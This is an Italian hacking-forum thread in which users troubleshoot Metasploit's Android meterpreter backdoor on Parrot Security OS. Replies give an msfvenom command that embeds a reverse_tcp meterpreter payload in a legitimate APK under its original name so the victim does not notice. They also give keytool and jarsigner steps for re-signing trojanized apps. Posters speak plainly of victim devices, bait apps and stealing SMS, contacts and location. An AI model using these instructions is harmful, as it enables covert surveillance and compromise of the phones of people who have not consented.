Parrot Security OS parrot 3.1 : backdoor di metasploit manca in qualcosa con questa ultima versione….

Stato
Discussione chiusa ad ulteriori risposte.

ArrackHack

Utente Gold
4 Marzo 2015
552
77
47
240
Ultima modifica:
Salve forum,

dopo un po' di tempo ho riscaricato la nuova versione di parrot security os… Quindi ho creato una backdoor per android e poi ho messo in ascolto il listener di metasploit….
Una volta avvenuta la connessione ho notato subito delle differenze… Innanzi tutto l'app main activity scompare proprio dal dispositivo ( e questa è una cosa molto positiva mentre prima non lo faceva), ma aprendo il menu dei comandi con help, ho notato subito che mancano molti comandi con la nuova versione di metasploit quali ad esempio dump_sms (per prelevare gli sms), oppure inviare sms, oppure ancora non c'è più check_root , dump contacts o ancora la localizzazione con il gps… ma nemmeno escono i nuovi comandi nel menu help di meterpreter nel caso fossero cambiati con le nuove versioni!..
Quello che voglio dire sono stati rimossi completamente questi comandi oppure è cambiato il loro nome dopo l'aggiornamento di metasploit e tutto il sistema ma non appaiono nel menu help???

Grazie.
 
ma.. secondo te.. parrot va aggiornato? e semplice installare una OS.. ma..
 
Salve forum,

dopo un po' di tempo ho riscaricato la nuova versione di parrot security os… Quindi ho creato una backdoor per android e poi ho messo in ascolto il listener di metasploit….
Una volta avvenuta la connessione ho notato subito delle differenze… Innanzi tutto l'app main activity scompare proprio dal dispositivo ( e questa è una cosa molto positiva mentre prima non lo faceva), ma aprendo il menu dei comandi con help, ho notato subito che mancano molti comandi con la nuova versione di metasploit quali ad esempio dump_sms (per prelevare gli sms), oppure inviare sms, oppure ancora non c'è più check_root , dump contacts o ancora la localizzazione con il gps… ma nemmeno escono i nuovi comandi nel menu help di meterpreter nel caso fossero cambiati con le nuove versioni!..
Quello che voglio dire sono stati rimossi completamente questi comandi oppure è cambiato il loro nome dopo l'aggiornamento di metasploit e tutto il sistema ma non appaiono nel menu help???

Grazie.

ciao io ho un problema simile al tuo.. i comandi non sono scomparsi o tolti ma praticamente non gli ha caricati perciò devi scrivere quando sei in mterpreter
load android
e ti carica tutto ma effettivamente avrai problemi anche nell'entrare in shell dicendo che ha un tipo di errore.. sarebbe tutto questo un bug di metasploit poiché presumo tu abbia la versione 4.12.21 o 4.12.24 ma anche se lo aggiorni alla 4.12.27 o anche alla 4.12.28 questo problema non lo avrai più bensi avrai problemi con la creazione della backdoor poiché non riesce a trovare la classe dentro a com.metasploit.stage
 
Che versione hai di parrot?

Inviata da Redmi Note 3 tramite app ufficiale di Inforge.net
3.1
ciao io ho un problema simile al tuo.. i comandi non sono scomparsi o tolti ma praticamente non gli ha caricati perciò devi scrivere quando sei in mterpreter
load android
e ti carica tutto ma effettivamente avrai problemi anche nell'entrare in shell dicendo che ha un tipo di errore.. sarebbe tutto questo un bug di metasploit poiché presumo tu abbia la versione 4.12.21 o 4.12.24 ma anche se lo aggiorni alla 4.12.27 o anche alla 4.12.28 questo problema non lo avrai più bensi avrai problemi con la creazione della backdoor poiché non riesce a trovare la classe dentro a com.metasploit.stage

io per fortuna avevo un parrot più vecchio con una versione più antiquata di metasploit con più comandi e tutta funzionante.
Ho provato ad aggiornare metasploit, quando postai questa domanda inerente al problema, e forse ora dovrei riprovare, ma che io ricordi il problema persisteva….. Che si fa ?
 
Niente bisogna sperare che rapid7 possa risolvere il problema o se sei un genio in java ti crei tu il meterpreter da zero mentre per metasploit lo aggiorni alla 4.12.27 che di per se (comando msfconsole) non mi sta dando problemi

Inviata da SM-N910F tramite app ufficiale di Inforge.net
 
Msf a me funziona bene con kali e i comandi da te citati ci sono e funzionano. L'unico problema con Android in certi dispositivi quando apro l'apk mi da errore


Inviata da iPhone tramite app ufficiale di Inforge.net
 
643c972bdc0178c66d3eb53e2111e316.jpg


Quando apro l apk infetta sul cellulare mi da questo errore


Inviata da iPhone tramite app ufficiale di Inforge.net
 
Sicuramente avrai fatto l'apk a mano usando apktool o almeno è solito fare apktool quando hai un apk originale e dentro ci metti il malware.. ma appena la vuoi richiudere dopo aver dato il giusto comando con apktool devi scrivere questo
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey
Dove apk_path sta per la posizione di dove l'apk creata ma ti potrebbe dare errori poiché forse tu non hai il file /root/.android/debug.keystore ma tranquillo che con quest'altro comando risolverai questo problema
keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US"


Inviata da SM-N910F tramite app ufficiale di Inforge.net
 
Ma infatti non in tutti, non so se sia una coincidenza ma in un dispositivo con permessi root non lo da l'errore mentre in quello senza root da l'errore, adesso provo con jarsigner


Inviata da iPhone tramite app ufficiale di Inforge.net
 
Ma infatti sto riscontrando problemi che ai tempi di Backtrack5 non esistevano, invece di migliorare col tempo peggiora.

Codice:
keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US"

Generazione in corso di una coppia di chiavi DSA da 1.024 bit e di un certificato autofirmato (SHA1withDSA) con una validità di 90 giorni
   per: CN=Android Debug, O=Android, C=US
[Memorizzazione di /root/.android/debug.keystore] in corso
Errore keytool: java.io.FileNotFoundException: /root/.android/debug.keystore (File o directory non esistente)
java.io.FileNotFoundException: /root/.android/debug.keystore (File o directory non esistente)
   at java.io.FileOutputStream.open0(Native Method)
   at java.io.FileOutputStream.open(FileOutputStream.java:270)
   at java.io.FileOutputStream.<init>(FileOutputStream.java:213)
   at java.io.FileOutputStream.<init>(FileOutputStream.java:101)
   at sun.security.tools.keytool.Main.doCommands(Main.java:1144)
   at sun.security.tools.keytool.Main.run(Main.java:343)
   at sun.security.tools.keytool.Main.main(Main.java:336)

mi da errore.
 
Prego per l'aiuto comunque si hai ragione ai tempi di backtrack (anche se non esistevo) erano molto meglio.. infatti ora non so come risolvere quel problema di android

Inviata da SM-N910F tramite app ufficiale di Inforge.net
 
in che senso? c'è intendi se puoi usare jarsigner per qualsiasi applicazione?
no nel senso che se ad esempio prendessi l'api riguardante un'altra applicazione e la vorrei blindare con l'apk backdoor che sarebbe il virus, in modo tale da far installare sia l'applicazione promessa che in contemporanea il virus , mediante lo stesso apk, per non destare sospetti.

Comunque i comandi sono stati caricati correttamente grazie a load android, però il comando shell non funziona mentre prima sì.
 
esiste un comando da msfvenom che ti permette di inserire i dati del payload dentro un applicazione originale casuale (tranne gli av, facebook o comunque apk più "famosi" vanno fatti a mano usando apktool)
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=porta -x /percorso-del-file/file.apk -o /altro-percorso/file.apk
i file.apk al posto del file metti l'esatto nome dato dall'apk cosi non se ne accorgerà di niente

se il comando shell non va devi aggiornale metasploit alla 4.12.27
 
esiste un comando da msfvenom che ti permette di inserire i dati del payload dentro un applicazione originale casuale (tranne gli av, facebook o comunque apk più "famosi" vanno fatti a mano usando apktool)
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=porta -x /percorso-del-file/file.apk -o /altro-percorso/file.apk
i file.apk al posto del file metti l'esatto nome dato dall'apk cosi non se ne accorgerà di niente

ah ok perfetto, ma poi se disinstallo l'applicazione "esca" dal dispositivo vittima, viene automaticamente eliminato anche l'api payload o no?

se il comando shell non va devi aggiornale metasploit alla 4.12.27

Proprio ora ho aggiornato tutta la distro con

Codice:
apt-get update
apt-get install diet-upgrade
// e per sicurezza
msfupdate
ma nulla non va la shell, poi con sta nuova versione ogni volta devi ricordarti di scrivere load android o load windows…. mah
 
ah ok perfetto, ma poi se disinstallo l'applicazione "esca" dal dispositivo vittima, viene automaticamente eliminato anche l'api payload o no?

beh si se disinstalla l'apk con backdoor si cancella tutto poiché comunque i file sono sempre e comunque dentro all'apk

Codice:
apt-get update
apt-get install diet-upgrade
// e per sicurezza
msfupdate

ma nulla non va la shell, poi con sta nuova versione ogni volta devi ricordarti di scrivere load android o load windows…. mah

Non basta se sei in parrot devi andare in parrot upgrade manager e scaricarti i repository testing e installare il tutto o se no https://github.com/rapid7/metasploit-framework/releases dentro a questo sito ti scarichi la versione più recente e fai bundle install e stai anche sicuro che avrai problemi poiché non riuscirà ad installar
 
  • Mi piace
Reazioni: Vuln Exploit
beh si se disinstalla l'apk con backdoor si cancella tutto poiché comunque i file sono sempre e comunque dentro all'apk

Codice:
apt-get update
apt-get install diet-upgrade
// e per sicurezza
msfupdate



Non basta se sei in parrot devi andare in parrot upgrade manager e scaricarti i repository testing e installare il tutto o se no https://github.com/rapid7/metasploit-framework/releases dentro a questo sito ti scarichi la versione più recente e fai bundle install e stai anche sicuro che avrai problemi poiché non riuscirà ad installar
Grazie, problema risolto, sei stato utilissimo
 
Stato
Discussione chiusa ad ulteriori risposte.